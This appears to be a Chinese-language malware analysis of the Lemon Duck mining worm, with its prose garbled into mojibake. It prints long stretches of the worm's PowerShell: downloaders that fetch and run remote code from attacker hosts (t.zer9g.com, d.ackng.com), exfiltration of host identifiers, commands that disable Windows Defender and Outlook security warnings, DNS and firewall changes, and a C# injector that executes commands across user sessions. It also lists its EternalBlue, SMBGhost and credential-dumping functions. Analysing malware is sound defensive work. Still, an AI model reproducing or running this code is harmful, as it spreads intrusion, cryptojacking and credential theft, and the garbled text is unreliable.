åè½ä¸è·ä¸çæ¬çæ ·æ¬ç¸æ¯ï¼MD5=51f6eba99e2b33e5458d78e41a130fe2ï¼å»é¤Hostæä»¶åå¥

æç»åå¥è®¡åä»»å¡çæ»å»æä»¤ï¼

function a($u){
    $d=(New-Object Net.WebClient)."DownloadData"($u)
    $c=$d.count
    if($c -gt 173){$b=$d[173..$c]
    $p=New-Object Security.Cryptography.RSAParameters
    $p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=')
    $p.Exponent=0x01,0x00,0x01
    $r=New-Object Security.Cryptography.RSACryptoServiceProvider
    $r.ImportParameters($p)
    if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){Iex(-join[char[]]$b)}}
}
$url='http://'+'t.zer'+'9g.com'
a($url+'/a.jsp?mail_20200603?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

éè¿RSAæ ¡éªåè¯·æ±å¹¶æ§è¡è¿ç¨èæ¬a.jsp

a.jsp ï¼æç¿åä¼ æï¼

http://t.zer9g.com/a.jsp?<SYS ENV><RANDOM NUM>
(MD5 = 1540b9fe58b8279bd256aaad9d879fbe)

a.jsp çæä½å¤æå¾å¤ï¼ä¸»è¦æ¯

å è½½æ§è¡ if.binè è«æ¨¡å

å³éOutlookå®å¨åè¦ï¼å è½½æ§è¡if_mail.bin

# å¤æå½åè¿è¡ç¯å¢ 64ä½/32ä½
if([IntPtr]::Size -eq 8){$is64=$true}
$ifbin="if.bin"
$ifmd5="45ef8d4faac68bd425bfdfe064602377"
if($is64){
	$mbin="m6.bin"
	$mmd5="5b2849ff2e8c335dcc60fd2155b2d4d3"
	$mgbin="m6g.bin"
	$mgmd5="23d59ed726e13edabcb751da7a5ce310"
}
# md5çæå½æ°
function gmd5($d){
	[Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')}
	return $l
}
# æ¬å°PayloadsMD5
$lifmd5,$lmmd5,$lmgmd5="","",""
try{
	$lifmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$ifbin"))
}catch{}
try{
	$lmmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$mbin"))
}catch{}
$down_url = "http://d.ackng.com"

# è·åmail.jspå®ä¹ç$url='http://'+'t.zer'+'9g.com'
$core_url = $url.split("/")[0..2]-join"/"
# ç®¡çåæéå¤å®
$permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")

# ç³»ç»ä¿¡æ¯è·å
$comp_name = $env:COMPUTERNAME
$guid = (get-wmiobject Win32_ComputerSystemProduct).UUID
$mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1
$osb = (Get-WmiObject -class Win32_OperatingSystem)
# ç³»ç»çæ¬
$os = $osb.Caption.replace("Microsoft Windows ","")+"_"+$osb.Version
$user = $env:USERNAME
# åä¿¡æ¯è·å
$domain = (Get-WmiObject win32_computersystem).Domain
# å¼æºæ¶é´
$uptime = [timespan]::FromMilliseconds([environment]::TickCount)|foreach{$_.totalseconds}
# æ¾å¡ä¿¡æ¯è·å
$card = (Get-WmiObject Win32_VideoController).name
# è·åååä¿¡æ¯
gwmi Win32_PhysicalMemory | %{$msum = 0} { $msum += $_.Capacity };
$mem=$msum/1Gb
# è·åæ»¡è¶³æ¡ä»¶çåå¨çä¿¡æ¯
try{
	$drive = ([system.IO.DriveInfo]::GetDrives() | where {$_.IsReady -and ($_.AvailableFreeSpace -gt 1024) -and (($_.DriveType -eq "Removable") -or ($_.DriveType -eq "Network")) -and (($_.DriveFormat -eq "NTFS") -or ($_.DriveFormat -eq "FAT32"))} | foreach{($_.Name)[0]+"_"+($_.DriveType.tostring())[0]})-join"|"
}catch{}

$timestamp = (Get-Date -UFormat "%s").Substring(0,9)
# XMRigç¿å·¥ä¿¡æ¯
try{
	[Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions")
	$obj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((new-object net.webclient)."downloadstring"('http://127.0.0.1:43669/1/summary'))
	$mv=$obj.version
	$mip=$obj.connection.ip
	$mhr=$obj.hashrate.total-join(',')
}catch{}
# å³éwindows Defenderçå®æ¶æ£æµ
try{
	Set-MpPreference -DisableRealtimeMonitoring $true
	Add-MpPreference -ExclusionPath c:\
	Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
}catch{}

if(($card -match "GTX|NVIDIA|GEFORCE")){$isn=1}
if(($card -match "Radeon|AMD")){$isa=1}
$params=@($comp_name,$guid,$mac)-join"&"
set-location $env:tmp
# è°ç¨cmdæ§è¡å½ä»¤çå½æ°
function stp($gra){
	Start-Process -FilePath cmd.exe -ArgumentList "/c $gra"
}

# æäº¤æ¬å°ä¿¡æ¯$comp_name,$guid,$macå¹¶ä¸è½½/è¿è¡æå®æä»¶å¹¶æ ¡éªå¶MD5
function gcf($code,$md,$fn){
	'powershell -c "'+$code+';$ifmd5='''+$md+''';$ifp=$env:tmp+''\'+$fn+''';$down_url='''+$down_url+''';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$_.ToString(''x2'')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient)."downloaddata"($down_url+''/'+$fn+'?'+$params+''');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}'
}
#  ä¸ä¸ä¸ªçæ¬ä¹åçåºå«å¨äº çæfnam.exe.oriæä»¶  æ·è´ä¸º $fnam.bin.exe å¹¶å¨CMDåå°æ§è¡ï¼ä¹åæ¯start-process 

# åå°å¼å è½½è¿è¡ä¸è½½çæä»¶
function gpa($fnam){
	'for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};iex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'''+"\$fnam.exe.ori"+''';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)|Get-Random -Count 100));test1 -PEBytes $bin"'+"&copy /y %tmp%\$fnam.exe.ori %tmp%\$fnam.bin.exe & %tmp%\$fnam.bin.exe"
}

# å¤å®/è·åç¹å®äºæ¥éæ¯å¦åå¨
# try{
# 	$localIf=$flase;
#	# åå»ºåä¸ºGlobal\eLocalIfçé,å¦ææä¸ååå»º
# 	New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf);
# }catch{}
function gcode($fl) {
	'try{$local'+$fl+'=$flase;New-Object Threading.Mutex($true,''Global\eLocal'+$fl+''',[ref]$local'+$fl+')}catch{}'
}

$code1=gcode "If"
IEx $code1

# å¦ææ¯æ°åå»ºçGlobal\eLocalIfåè¿è¡
# $ifp=$env:tmp+'\if.bin';
# $down_url='http://d.ackng.com';
# function gmd5($con){
#     [System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{
#         $s+=$_.ToString('X2')
#         };
#     return $s
# }
# # æ¯å¦åå¨if.binï¼åå¨åè¯»åï¼å¹¶è¿è¡MD5æ ¡éª
# if(test-path $ifp){
#     $con_=[System.IO.File]::ReadAllBytes($ifp);
#     $md5_=gmd5 $con_;
#     if($md5_-eq$ifmd5){
#         $noup=1
#     }
# }
# # è¥æ²¡æéè¿MD5,ææä»¶ä¸åå¨åä¸è½½
# if(!$noup){
#     # http://d.ackng.com/if.bin?
#     $con=(New-Object Net.WebClient)."downloaddata"($down_url+'/if.bin?');
#     $t=gmd5 $con;
#     if($t-eq$ifmd5){
#         [System.IO.File]::WriteAllBytes($ifp,$con)
#     }else{$noup=1}
# }
# if($noup){
#     $con=$con_;
#     $ifmd5=$md5_
# }
# # è¿éæä¸ªå°ç»èï¼è¥æºå¨ä¸æ²¡æif.binä¸ä¸è½½çif.binæ²¡æéè¿MD5æ ¡éªçåä¸ä¼æ§è¡å¶åå«çå½ä»¤
# IEX(-join[char[]]$con)
if($localIf){
	stp ((gcf $code1 $ifmd5 $ifbin)+'IEX(-join[char[]]$con)"')
}

# ç¨å¤å½æ°æ¼æ¥çæè¯å¥ï¼éé¿æ£æµ
# éå¯¹64ä½ç³»ç»
if($is64){
	# try{
	# 	$localMn=$flase;
	# 	New-Object Threading.Mutex($true,'Global\eLocalMn',[ref]$localMn)
	# }catch{}
	$code2=gcode "Mn"
	IEx $code2
	if($localMn){
		# $ifmd5='5b2849ff2e8c335dcc60fd2155b2d4d3';
		# $ifp=$env:tmp+'\m6.bin';
		# $down_url='http://d.ackng.com';
		# function gmd5($con){
		# 	[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{
		# 		$s+=$_.ToString('X2')};
		# 	return $s
		# }

		# if(test-path $ifp){
		# 	$con_=[System.IO.File]::ReadAllBytes($ifp);
		# 	$md5_=gmd5 $con_;
		# 	if($md5_-eq$ifmd5){
		# 		$noup=1
		# 	}
		# }
		# if(!$noup) {
		# 	# http://d.ackng.com/m6.bin?
		# 	$con=(New-Object Net.WebClient)."downloaddata"($down_url+'/m6.bin?');
		# 	$t=gmd5 $con;
		# 	if($t-eq$ifmd5){
		# 		[System.IO.File]::WriteAllBytes($ifp,$con)
		# 	}
		# 	else{
		# 		$noup=1
		# 	}
		# }
		# if($noup){
		# 	$con=$con_;
		# 	$ifmd5=$md5_
		# }

		# ### ä»¥ä¸æ¯gpaå½æ°çæçä»£ç 
		# for($i=0;$i -lt $con.count-1;$i+=1){
		# 	if($con[$i] -eq 0x0a){
		# 		break
		# 	}
		# }
		# # ä»¥0x0Aæªææä»¶ ï¼æ§è¡ååé¨åï¼å®ä¹test1å½æ° 
		# iex(-join[char[]]$con[0..$i]);

		# $bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);
		# $bin_=$bin.Clone();
		# test1 -PEBytes $bin;
		# $mep=$env:tmp+'\m6.bin.exe';
		# # å¨æç¿ç¨åºåè¿½å éæºåèï¼ä¿å
		# [System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)|Get-Random -Count 100));
		# # è¿è¡ä¸ä¸æ¥çæçç¨åº
		# start-process -FilePath $mep
		stp ((gcf $code2 $mmd5 $mbin)+(gpa $mbin))
	}
}
if(($isn -or $isa) -and $is64){
	$code3=gcode "Mng"
	# try{
	# 	$localMng=$flase;
	# 	New-Object Threading.Mutex ($true,'Global\eLocalMng',[ref]$localMng)
	# }catch{ }
	IEx $code3
	if($localMng){
		stp ((gcf $code3 $mgmd5 $mgbin)+(gpa $mgbin))
	}
}
# ä¿®æ¹DNS
try{
	(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))
}catch{}

# æºå¸¦ä¿¡æ¯ï¼
# ç³»ç»ï¼ç³»ç»ä½æ°ï¼ç¨æ·ï¼åï¼ç£çï¼æ¾å¡ï¼ååï¼ç®¡çåæéï¼æ¬å°è è«æ»å»Payloadï¼æ¬å°xmrigPayloadï¼xmrigçæ¬ï¼ç¿æ± å°åï¼ç®åï¼å¼æºæ¶é´ï¼ä¸ä¼ æ¶é´
$params+="&"+(@($os,[Int]$is64,$user,$domain,$drive,$card,$mem,[Int]$permit,($lifmd5[0..5]-join""),($lmmd5[0..5]-join""),$mv,$mip,$mhr,$uptime,$timestamp,"0.1")-join"&")
# è¿è¡RSAç¾åæ ¡éªåæ§è¡
function SIEX {  
	Param(
	[string]$url
	)
	try{
		$webclient = New-Object Net.WebClient
		$finalurl = "$url"+"?"+"$params"
		try{
			$webclient.Headers.add("User-Agent","Lemon-Duck-"+$Lemon_Duck.replace('\','-'))
		} catch{}
		$res_bytes = $webclient."DownloadData"($finalurl)
		if($res_bytes.count -gt 173){
			$sign_bytes = $res_bytes[0..171];
			$raw_bytes = $res_bytes[173..$res_bytes.count];
			$rsaParams = New-Object System.Security.Cryptography.RSAParameters
			# å¬é¥ 	2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0 M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=
			$rsaParams.Modulus = 0xda,0x65,0xa8,0xd7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,0xff,0x2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,0xcd,0x37,0x6b,0xf3,0x4f,0x3b,0x62,0x70,0x86,0x07,0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xdc,0x88,0xbf,0x35,0xf2,0x92,0xee,0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0xd1,0x19,0x30,0x73,0xc6,0x52,0x01,0xcd,0xe7,0xc7,0x34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0xcd,0x79,0x40,0xa7,0x91,0x6a,0xae,0x95,0x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a,0x98,0xdb,0x97,0x3f,0xf6,0x2e,0x95,0x10,0x72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0xea,0x38,0xb7,0x47,0x6b,0x5d
			$rsaParams.Exponent = 0x01,0x00,0x01
			$rsa = New-Object -TypeName System.Security.Cryptography.RSACryptoServiceProvider;
			$rsa.ImportParameters($rsaParams)
			$base64 = -join([char[]]$sign_bytes)
			$byteArray = [convert]::FromBase64String($base64)
			$sha1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
			if($rsa.verifyData($raw_bytes,$sha1,$byteArray)) {
				IEX (-join[char[]]$raw_bytes)
			}
		}
	} catch{}
}
SIEX "$core_url/report.jsp"
# flagæä»¶ (0kb)
$ff=$env:tmp+'\GkPiGedjuq8f91j.txt'
# ffæ¯å¦åå¨
if(!(Test-Path $ff)){
	## æå¼é²æ¤å¢è®¾ç½®DNSç«¯å£è½¬å
	cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd
	netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
	cmd.exe /c netsh.exe firewall add portopening tcp 65533 DNSd
	netsh.exe interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
	# ç¦æ¢445ï¼135çè®¿é®
	netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block
	netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block
	new-item $ff -type file
}
# è±ä¼è¾¾æ¾å¡ä¸64ä½ç³»ç»ï¼ä¼ä¸è½½æ¾å¡å éæç¿æä»¶
try{
	if($isn -and $is64){
		$nd="nvd.zip"
		$ndg="$env:tmp\nvdg.dat"
		if(!(test-path $ndg) -or (Get-Item $ndg).length -ne 18475008){
			(new-object Net.WebClient)."DownloadFile"($down_url+"/$nd","$env:tmp\$nd")
			(New-Object -ComObject Shell.Application).NameSpace($env:tmp).CopyHere("$env:tmp\$nd\*",16)
			Remove-Item $env:tmp\$nd
		}
	}
}catch{}

# å³éOutlookçå®å¨åè¦ 
# å½ç¨åºå°è¯è®¿é®æ¨çOutlookå®¢æ·ç«¯ä»¥ä»£è¡¨æ¨åéçµåé®ä»¶ï¼å¹¶ä¸æ£æµå°æ¨çé²çæ¯è½¯ä»¶å¤äºéæ´»å¨ç¶ææè¿ææ¶ï¼å°æ¾ç¤ºæ¤è¦åæ¶æ¯ã

$hks="HKEY_LOCAL_MACHINE\SOFTWARE\"
$mso="Microsoft\Office"
$wnd="Wow6432Node\"
$crm="ClickToRun\REGISTRY\MACHINE\Software\"
$paths=@("$hks$mso","$hks$wnd$mso","$hks$mso\$crm$mso","$hks$mso\$crm$wnd$mso")

# å¨32ä½Windowsä¸è¿è¡ç32ä½Officeæå¨64ä½Windowsä¸è¿è¡ç64ä½Office
# Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
# å¨64ä½Windowsä¸è¿è¡ç32ä½Office 
# Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office 
# éå¯¹å³ç¹å³ç¨çOfficeçæ¬
# Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Office
# Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Office
foreach($path in $paths){
	if(test-path Registry::$path){
		get-childitem Registry::$path -name|where-object{$_ -match "\d+" -and (Test-Path Registry::$path\$_\Outlook)}|foreach{
			$skey="Registry::$path\$_\Outlook\Security"
			if(!(Test-Path $skey)){
				New-Item $skey
			}
			Set-ItemProperty $skey ObjectModelGuard 2 -type Dword
			$mflag=test-path $skey
	}}
}
# å³éåè¦ä¹å
if($mflag){
	try{
		$localMail=$flase;
		New-Object Threading.Mutex($true,'Global\LocalMail',[ref]$localMail)
	}catch{}
	if($localMail){
		if(!(test-path $env:tmp\godmali3.txt)){
			SIEX "$down_url/if_mail.bin"
		}
	}
}

å¶æ§è¡è¿ç¨ä¸å¼å¯çæ¬å°DNSè½¬åæªå¾ï¼

if.binï¼ä¸»è¦æ»å»æ¨¡åï¼

http://d.ackng.com/if.bin?
MD5 (if.bin) = df5c8f7677a3361d17cc1ba820436ce9

æä¸ªç»èå¼å¾æ³¨æï¼

è¥æºå¨ä¸æ²¡æif.binä¸ä¸è½½çif.binæ²¡æéè¿MD5æ ¡éªï¼c2fcf4ebba3fbfa1fc4c82e728137076ï¼

åä¸å¼å§ä¸ä¼ç´æ¥æ§è¡if.binä¸åå«çå½ä»¤

å¨è°æ¥æé´ifbinå·²ç»æ´æ°åäºæ¬¡ä¹å¤ï¼

if.bin MD5 "00d1474b36d8f9daed96334d95749861"
if.bin MD5 "2c2ce2150f73a4df14b0e83581f68af3"
if.bin MD5 "3053160f2072509f2e167f1e82c7b539"
if.bin MD5 "45ef8d4faac68bd425bfdfe064602377"
if.bin MD5 "54bf14b942f61a878b26d5b844ad5ae0"
if.bin MD5 "6a9c39d88715c5262b34a68cea4fa331"
if.bin MD5 "74eea0ef800d170d79ef7d66c6a97709"
if.bin MD5 "b5ee1e46de1f709e778c4a53a79c767d"
if.bin MD5 "c2fcf4ebba3fbfa1fc4c82e728137076"
if.bin MD5 "def23ff364e25f64342f39d3f64d5aeb"
if.bin MD5 "df8679bded63cb99fd3bed16bf5a4397"
if.bin MD5 "e5ae6d154a6befc00deea0ccb49dc9b8"

åå«ä»¥ä¸æ»å»ï¼

ç«¯å£æ«æ
EternalBlue/MS17-010 éå¯¹Win7/Win8
æ´åç ´è§£ï¼å½ä»¤æ§è¡ï¼é¤èªèº«æºå¸¦åå¸å¤ï¼è¿ä¼å°è·åæ¬å°å£ä»¤/åè¯å å¥åå¸ï¼ï¼
- $IPC
- SMB
- MS-SQL
- RDP
- NTLM
- SSHï¼2020-06-01æ°å¢ï¼éå¯¹Linux rootè´¦å·ï¼
- WMI
CVE-2017-8464
CVE-2020-0796 SMBGhost (2020å¹´4ææ°å¢ï¼æ¼æ´å¨3æææ«é²)

å¶ä¸åå«å½æ°ï¼ç§°ä¹ä¸ºåç«åºä¸ä¸ºè¿ï¼

function make_smb1_anonymous_login_packet 
function smb1_anonymous_login
function negotiate_proto_request
function smb_header
function smb1_get_response
function client_negotiate
function tree_connect_andx
function tree_connect_andx_request
function smb1_anonymous_connect_ipc
function make_smb1_nt_trans_packet
function make_smb1_trans2_exploit_packet
function make_smb1_trans2_last_packet
function send_big_trans2
function createSessionAllocNonPaged
function make_smb1_free_hole_session_packet
function smb2_grooms
function make_smb2_payload_headers_packet
function eb7
function createFakeSrvNetBuffer8
function createFeaList8
function  make_smb1_login8_packet8 
function  make_ntlm_auth_packet8
function smb1_login8
function negotiate_proto_request8
function smb_header8
function smb1_get_response8
function client_negotiate8
function tree_connect_andx8
function tree_connect_andx8_request
function make_smb1_nt_trans_packet8
function make_smb1_trans2_exploit_packet8
function send_big_trans28
function createSessionAllocNonPaged8
function  make_smb1_free_hole_session_packet8
function make_smb2_payload_headers_packet8
function eb8
function Invoke-Myrdp
	function rdp_send
	function rdp_recv
	function rdp_send_recv
	function bytes_to_bignum
	function output
	function rdp_parse_serverdata
	function check_rdp
	function unpack
	function pdu_connect_initial
	function pdu_erect_domain_request
	function pdu_attach_user_request
	function pdu_channel_request
	function rsa_encrypt
	function pdu_security_exchange
	function pdu_client_info
	function pdu_client_confirm_active
	function pdu_client_persistent_key_list
	function rdp_salted_hash
	function rdp_hmac
	function rdp_rc4_crypt
	function rdp_final_hash
	function rdp_calculate_rc4_keys
	function rdp_encrypted_pkt
	function try_check
	function check
function geth 
function LoadApi
function sid_to_key
function str_to_key
function NewRC4
function des_encrypt
function des_decrypt
function des_transform
function Get-RegKeyClass
function Get-BootKey
function Get-HBootKey
function Get-UserName
function Get-UserHashes
function DecryptHashes
function DecryptSingleHash
function Get-UserKeys
function DumpHashes
function Invoke-Mypass
    function LGDJSR
    function Get-WiSDGKDants
    function Get-l64ftion
    function bud-ksgLHDnwn
    function Add-SignedIntAsUnsigned
    function Compare-Val1GreaterThanVal2AsUInt
    function Convert-UIntToInt
    function Test-MemoryRangeValid
    function Write-BytesToMemory
    function Get-DelegateType
    function klsdjlkhfDjswpdy
    function Enable-SeDebugPrivilege
    function sadkjhdsjD
    function Get-ImageNtHeaders
    function DHWE-kidD
    function KDHSD-JUWF
    function HDSK-OUHF
    function KJSHDeUFHEF7
    function Cthis-SectioDSns
    function LSHDjh3-upd
    function lhsdu-jsd
    function SDhk34JSD
    function usdKdhdf
    function KSHDUWKHF
    function SDHlhuhWEDSDDS
    function GessKUDBSD
    function LHSDGUKsdHF
    function SDLHLESDME
    function Main
function Invoke-SE
function ConvertFrom-PacketOrderedDictionary
function New-PacketNetBIOSSessionService
function New-PacketSMBHeader
function New-PacketSMBNegotiateProtocolRequest
function New-PacketSMBSessionSetupAndXRequest
function New-PacketSMBTreeConnectAndXRequest
function New-PacketSMBNTCreateAndXRequest
function New-PacketSMBReadAndXRequest
function New-PacketSMBWriteAndXRequest
function New-PacketSMBCloseRequest
function New-PacketSMBTreeDisconnectRequest
function New-PacketSMBLogoffAndXRequest
function New-PacketSMB2Header
function New-PacketSMB2NegotiateProtocolRequest
function New-PacketSMB2SessionSetupRequest
function New-PacketSMB2TreeConnectRequest
function New-PacketSMB2CreateRequestFile
function New-PacketSMB2ReadRequest
function New-PacketSMB2WriteRequest
function New-PacketSMB2CloseRequest
function New-PacketSMB2TreeDisconnectRequest
function New-PacketSMB2SessionLogoffRequest
function New-PacketNTLMSSPNegotiate
function New-PacketNTLMSSPAuth
function New-PacketRPCBind
function New-PacketRPCRequest
function New-PacketSCMOpenSCManagerW
function New-PacketSCMCreateServiceW
function New-PacketSCMStartServiceW
function New-PacketSCMDeleteServiceW
function New-PacketSCMCloseServiceHandle
function Get-StatusPending
function Get-UInt16DataLength
function Invoke-SMBC
function ConvertFrom-PacketOrderedDictionary
function New-PacketNetBIOSSessionService
function New-PacketSMBHeader
function New-PacketSMBNegotiateProtocolRequest
function New-PacketSMBSessionSetupAndXRequest
function New-PacketSMB2Header
function New-PacketSMB2NegotiateProtocolRequest
function New-PacketSMB2SessionSetupRequest
function New-PacketSMB2TreeConnectRequest
function New-PacketSMB2CreateRequest
function New-PacketSMB2FindRequestFile
function New-PacketSMB2QueryInfoRequest
function New-PacketSMB2ReadRequest
function New-PacketSMB2WriteRequest
function New-PacketSMB2CloseRequest
function New-PacketSMB2TreeDisconnectRequest
function New-PacketSMB2SessionLogoffRequest
function New-PacketSMB2IoctlRequest
function New-PacketSMB2SetInfoRequest
function New-PacketNTLMSSPNegotiate
function New-PacketNTLMSSPAuth
function Get-UInt16DataLength
function Invoke-SMBGhost
	function check_vul
	function check
function copyrun 
function db_query
function mssqlrun
function sshbrute
function isPubIP 
function getipaddrs
function localscan

m6.bin (XMRig)

http://d.ackng.com/m6.bin?
MD5 (m6.bin) = 5b2849ff2e8c335dcc60fd2155b2d4d3

è¿ç¨æä»¶m6.binä¸ï¼åå«XMRigç¨åºï¼

ä»¥0x0Aæªæ

ååé¨åä¸ºPowershellèæ¬
- é¿è¾¾2700å¤è¡ï¼å®ä¹test1å½æ°ï¼å33ä¸ªåå½æ°
- çä¼¼ä½¿ç¨https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
ååé¨åä¸º PE32+ executable (console) x86-64, for MS Windows å¯æ§è¡æä»¶

m6g.bin (XMRig opencl cuda)

è¥æ¯64ä½ç³»ç»ï¼ä¸æAMD/NVIDIAçæ¾å¡ï¼åæ ¹æ®äºæ¥éï¼Global\eLocalMngï¼ä¸è½½ï¼

http://d.ackng.com/m6g.bin
MD5 (m6g.bin) = 23d59ed726e13edabcb751da7a5ce310

ä¸m6.binçä¸åï¼å®çAPIå¼æ¾ç«¯å£ä¸ºï¼

http://127.0.0.1:43668/1/summary

if_mail.bin (ä½¿ç¨Outlookä¼ æçæçæ¶æææ¡£)

http://d.ackng.com/if_mail.bin
MD5 (if_mail.bin) = 88949e6a329c6b2796ddcc81564cee1a

å¶é¨åæ ¸å¿ä»£ç ï¼

# è¥æ¯ç®¡çåæéï¼åå»ºç®¡éæ§è¡mail_code 
if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){
    # powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream(''\\.\pipe\HHyeuqi7'')
    # $pipe.WaitForConnection()
    # $sr=new-object System.IO.StreamReader($pipe)
    # $cmd=$sr.ReadToEnd()
    # $sr.Dispose()
    # $pipe.Dispose()
    # IEx($cmd)
    # (new-object System.IO.Pipes.NamedPipeServerStream(''\\.\pipe\HHyeuqi7'')).WaitForConnection()
	$sesscmd='powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream(''\\.\pipe\HHyeuqi7'');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();IEx($cmd);(new-object System.IO.Pipes.NamedPipeServerStream(''\\.\pipe\HHyeuqi7'')).WaitForConnection()'
    # // ä½¿ç¨Windowsé«çº§APIæ¥è·åå½åç»å½ç¨æ·çè®¿é®ä»¤ç,ä»¥è·åå°çç¨æ·èº«ä»½æ§è¡å½ä»¤
    # // è¿æè®¡ç®æºä¸ææç»å½çç¨æ·ä¼è¢«åéé®ä»¶
    [Utils.ProcessExtensions]::EnumSessionsAndExecCmd($sesscmd.Trim())

	$pipe=new-object System.IO.Pipes.NamedPipeClientStream("\\.\pipe\HHyeuqi7");
    $pipe.Connect();
    $sw=new-object System.IO.StreamWriter($pipe);
    $sw.WriteLine($mail_code);
    $sw.Dispose();
    $pipe.Dispose()
	(new-object System.IO.Pipes.NamedPipeClientStream("\\.\pipe\HHyeuqi7")).Connect()
	"Done and exit..."
}else{
	IEx $mail_code
}

new-item $env:tmp\godmali3.txt -type file -force

å¨å½åç¯å¢ä¸æ³¨å¥ä¸æ®µC#ä»£ç

è¿æå³çä¼å½±åè®¡ç®æºä¸ææç»å½ç¨æ·

using System;
using System.Runtime.InteropServices;
namespace Utils
{
    public static class ProcessExtensions
    {
        private const uint INVALID_SESSION_ID = 0xFFFFFFFF;
        [DllImport("advapi32.dll", EntryPoint = "CreateProcessAsUser", SetLastError = true, CharSet = CharSet.Ansi, CallingConvention = CallingConvention.StdCall)]
        private static extern bool CreateProcessAsUser(
            IntPtr hToken,
            String lpApplicationName,
            String lpCommandLine,
            IntPtr lpProcessAttributes,
            IntPtr lpThreadAttributes,
            bool bInheritHandle,
            uint dwCreationFlags,
            IntPtr lpEnvironment,
            String lpCurrentDirectory,
            ref STARTUPINFO lpStartupInfo,
            out PROCESS_INFORMATION lpProcessInformation);
        [DllImport("advapi32.dll", EntryPoint = "DuplicateTokenEx")]
        private static extern bool DuplicateTokenEx(
            IntPtr ExistingTokenHandle,
            uint dwDesiredAccess,
            IntPtr lpThreadAttributes,
            int TokenType,
            int ImpersonationLevel,
            ref IntPtr DuplicateTokenHandle);
        [DllImport("userenv.dll", SetLastError = true)]
        private static extern bool CreateEnvironmentBlock(ref IntPtr lpEnvironment, IntPtr hToken, bool bInherit);
        [DllImport("userenv.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool DestroyEnvironmentBlock(IntPtr lpEnvironment);
